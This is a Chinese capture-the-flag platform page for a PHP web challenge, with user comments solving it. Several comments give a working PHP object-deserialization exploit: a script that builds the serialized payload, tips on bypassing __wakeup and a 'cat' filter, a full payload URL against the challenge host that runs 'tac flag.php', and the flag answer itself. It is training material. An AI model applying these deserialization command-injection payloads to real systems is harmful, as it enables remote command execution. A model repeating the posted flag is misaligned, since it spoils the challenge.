安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2002
提  示:
描  述:
flag{}
评论
不会编程的崽 1年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 1年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 1年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 1年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 1年前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 2年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 2年前

特别要注意下url编码的问题

回复 0

泡椒控卫 2年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

追风亚索 2年前

flag{Unser1alize_and_2CE_Add},flag是不是没变

回复 0

笨笨笨蛋 2年前

只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~

回复 2

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

yht111 攻破了该题 1天前
a5580990 攻破了该题 3天前
2410968090 攻破了该题 6天前
蟹堡王第一厨师长 攻破了该题 9天前
llc123 攻破了该题 11天前
294903544 攻破了该题 12天前
19933663636 攻破了该题 16天前
GS 攻破了该题 17天前
Ftcioer 攻破了该题 17天前
不上早八 攻破了该题 20天前
Sadoshi 攻破了该题 21天前
pezn1and 攻破了该题 22天前
jiayouya 攻破了该题 23天前
YEaling 攻破了该题 25天前
18897888104 攻破了该题 27天前
clannad 攻破了该题 28天前
mxdyld 攻破了该题 1月前
ct1640 攻破了该题 1月前
18079625201 攻破了该题 1月前
jadxbug 攻破了该题 1月前
问题反馈